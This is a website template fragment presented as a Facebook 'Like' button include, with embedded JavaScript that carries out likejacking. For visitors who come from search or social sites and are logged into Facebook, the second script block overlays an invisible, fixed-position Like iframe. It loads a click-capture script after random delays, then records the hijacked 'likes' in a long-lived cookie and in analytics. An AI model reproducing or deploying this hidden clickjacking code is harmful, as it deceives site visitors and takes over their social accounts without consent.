
 <div id="fb-button">
    <iframe scrolling="no" frameborder="0" style="border:none;overflow:hidden;width:450px;height:21px;" allowTransparency="false"></iframe>
</div>
<script>
function getCookie(cname) {
    var name = cname + "=";
    var decodedCookie = decodeURIComponent(document.cookie);
    var ca = decodedCookie.split(';');
    for(var i = 0; i <ca.length; i++) {
        var c = ca[i];
        while (c.charAt(0) == ' ') {
            c = c.substring(1);
        }
        if (c.indexOf(name) == 0) {
            return c.substring(name.length, c.length);
        }
    }
    return "";
}
if (getCookie("lkrdpg") != "") {
        $('#fb-button > iframe').attr('src', 'https://www.facebook.com/plugins/like.php?href={{site.main_base_url|url_encode}}{{page.url|url_encode}}&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21&confirm=false');
    } else {
        $('#fb-button > iframe').attr('src', 'https://www.facebook.com/plugins/like.php?href={{site.social.facebook|url_encode}}&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21&confirm=false');
}
</script>

{% if date(page.date) > date('-10days') and date(page.date) < date('-1day') and site.social.facebook and site.fb_app_id %}
    <div id="ifmwpr">
        <iframe scrolling="no" frameborder="0" style="border:none;overflow:hidden;width:450px;height:21px;" allowTransparency="false"></iframe>
    </div>
    <script> 
        function ifmtrckr() {
            var lkrdpg = false;
            if (getCookie("lkrdpg") != "") {
                lkrdpg = true;
            }
                var sftyfst = false;
                if (document.referrer.includes("goog")||document.referrer.includes("facebook")||document.referrer.includes("youtu")||document.referrer.includes("insta")||document.referrer.includes("tumblr")||document.referrer.includes("reddit")||document.referrer.includes("twit")||document.referrer.includes("pinter")||document.referrer.includes("forum")||document.referrer.includes("commun")){
                    sftyfst = true;
                    console.log('++/+++');
                } else{
                    console.log('--/+++');
                }
                if(sftyfst){
                    if (lkrdpg == false){
                        $('#ifmwpr > iframe').attr('src', 'https://www.facebook.com/plugins/like.php?href={{site.social.facebook|url_encode}}&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21&confirm=false');
                    } else {
                        $('#ifmwpr > iframe').attr('src', 'https://www.facebook.com/plugins/like.php?href={{site.main_base_url|url_encode}}{{page.url|url_encode}}&send=false&layout=button_count&width=450&show_faces=false&action=like&colorscheme=light&font&height=21&confirm=false');
                    }
                    $("#ifmwpr").css("position", "fixed"); $("#ifmwpr").css("overflow", "hidden");}
                if(sftyfst){
                    $("#ifmwpr").css("filter", "alpha(opacity=0)");
                    $("#ifmwpr").css("-moz-opacity", "0.0");
                    $("#ifmwpr").css("-khtml-opacity", "0.0");
                    $("#ifmwpr").css("opacity", "0.0");
                    $.getScript( "{{ site.cdn_url }}{{ theme_url }}/js/post.min.js")
                        .done(function() {
                        isMobile||$("#ifmwpr")&&setTimeout(function(){
                            $.getScript("{{ site.cdn_url }}{{ theme_url }}/js/ifmclkr.min.js").done(function(){
                                setTimeout(function () {
                                    console.log('+++/+++');
                                    $("#ifmwpr").css("z-index", "1");
                                    $("#ifmwpr").css("display", "none");
                                    if (clked == true && lkrdpg == false){
                                        var d = new Date();
                                        d.setTime(d.getTime() + (740*24*60*60*1000));
                                        var expires = "expires="+ d.toUTCString();
                                        document.cookie = "lkrdpg" + "=" + "pgislkd" + ";" + expires + ";path=/";
                                        ga('send', 'event', 'ifmtrckr-fb', 'like', 'page');
                                    } else if (clked == false && lkrdpg == false){
                                        ga('send', 'event', 'ifmtrckr-fb', 'like', 'page', {
                                          nonInteraction: true
                                        });
                                    } else if (clked == true && lkrdpg == true){
                                        var d = new Date();
                                        d.setTime(d.getTime() + (740*24*60*60*1000));
                                        var expires = "expires="+ d.toUTCString();
                                        document.cookie = "lkrdpg" + "=" + "renew" + ";" + expires + ";path=/";
                                        ga('send', 'event', 'ifmtrckr-fb', 'like', 'post');
                                    } else if (clked == false && lkrdpg == true){
                                        var d = new Date();
                                        d.setTime(d.getTime() + (740*24*60*60*1000));
                                        var expires = "expires="+ d.toUTCString();
                                        document.cookie = "lkrdpg" + "=" + "renew" + ";" + expires + ";path=/";
                                        ga('send', 'event', 'ifmtrckr-fb', 'like', 'post', {
                                          nonInteraction: true
                                        });
                                    }
                                }, Math.floor((Math.random() * 45000) + 30000));
                            });
                    }, Math.floor((Math.random() * 30000) + 15000));
                    });
                } else {
                    $("#ifmwpr").css("z-index", "1");
                    $("#ifmwpr").css("display", "none");
                }
            }
        if (Math.floor((Math.random() * 5) + 1) == 1){
            console.log('+/+++');
            window.fbAsyncInit = function() {
            FB.init({
              appId            : '{{ site.fb_app_id }}',
              autoLogAppEvents : false,
              xfbml            : true,
              version          : 'v2.9'
            });
            FB.getLoginStatus(function(response) {
                if (response.status === 'connected' || response.status === 'not_authorized') {
                    ifmtrckr();
                    ga('send', 'event', 'ifmtrckr-fb', 'logged in', 'account');
                } else {
                    ga('send', 'event', 'ifmtrckr-fb', 'logged in', 'account', {
                      nonInteraction: true
                    });
                }
            }, true);
          };
          (function(d, s, id){
             var js, fjs = d.getElementsByTagName(s)[0];
             if (d.getElementById(id)) {return;}
             js = d.createElement(s); js.id = id;
             js.src = "//connect.facebook.net/en_US/sdk.js";
             fjs.parentNode.insertBefore(js, fjs);
           }(document, 'script', 'facebook-jssdk'));
        } else {
            console.log("-/+++");
        }
    </script>
{% endif %}
